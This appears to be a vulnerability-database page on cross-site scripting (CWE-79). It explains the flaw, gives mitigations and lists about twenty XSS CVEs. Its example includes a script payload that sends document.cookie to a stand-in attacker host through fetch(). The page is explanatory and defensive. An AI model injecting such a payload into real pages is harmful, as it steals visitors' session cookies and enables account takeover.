Fallos del tipo CWE-79

28.777 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-38724MEDIUMSilverstripe silverstripe/framework through 4.11.0, silverstripe/assets through 1.11.0, and silverstripe/asset-admin through 1.11.0 allow XSEPSS 0.7%CVE-2022-2655—Classified Listing Pro < 2.0.20 - Reflected Cross-Site ScriptingEPSS 0.7%CVE-2021-32851MEDIUMjQuery MiniColors vulnerable to Cross-site ScriptingEPSS 0.7%CVE-2025-24981CRITICALParsed HTML anchor links in Markdown provided to parseMarkdown can result in XSS in @nuxtjs/mdcEPSS 0.7%CVE-2026-33066MEDIUMSiYuan has Stored XSS to RCE via Unsanitized Bazaar README RenderingEPSS 0.7%CVE-2023-3009HIGHCross-site Scripting (XSS) - Stored in nilsteampassnet/teampassEPSS 0.7%CVE-2021-24702—LearnPress < 4.1.3.1 - Multiple Admin+ Stored Cross-Site ScriptingEPSS 0.7%CVE-2024-0266MEDIUMProject Worlds Online Lawyer Management System User Registration cross site scriptingEPSS 0.7%CVE-2024-39203MEDIUMA cross-site scripting (XSS) vulnerability in the Backend Theme Management module of Z-BlogPHP v1.7.3 allows attackers to execute arbitrary EPSS 0.7%CVE-2022-3231MEDIUMCross-site Scripting (XSS) - Stored in librenms/librenmsEPSS 0.7%CVE-2020-5294MEDIUMReflected XSS with social networks fieldsEPSS 0.7%CVE-2021-25115—WP Photo Album Plus < 8.0.10 - Stored Cross-Site Scripting (XSS)EPSS 0.7%CVE-2023-0607HIGHCross-site Scripting (XSS) - Stored in projectsend/projectsendEPSS 0.7%CVE-2021-37518MEDIUMUniversal Cross Site Scripting (UXSS) vulnerability in Vimium Extension 1.66 and earlier allows remote attackers to run arbitrary code via oEPSS 0.7%CVE-2017-20159LOWrf Keynote rumble.rb cross site scriptingEPSS 0.7%CVE-2026-81887MEDIUMLivewire DOM-based cross-site scripting during client-side state handlingEPSS 0.7%CVE-2022-23638MEDIUMCross-site Scripting in svg-sanitizerEPSS 0.7%CVE-2023-23942MEDIUMSelf reflected HTML injection in Desktop clientEPSS 0.7%CVE-2021-24494—WP Offload SES Lite < 1.4.5 - Stored Cross-Site Scripting (XSS)EPSS 0.7%CVE-2022-2646LOWSourceCodester Online Admission System index.php cross site scriptingEPSS 0.7%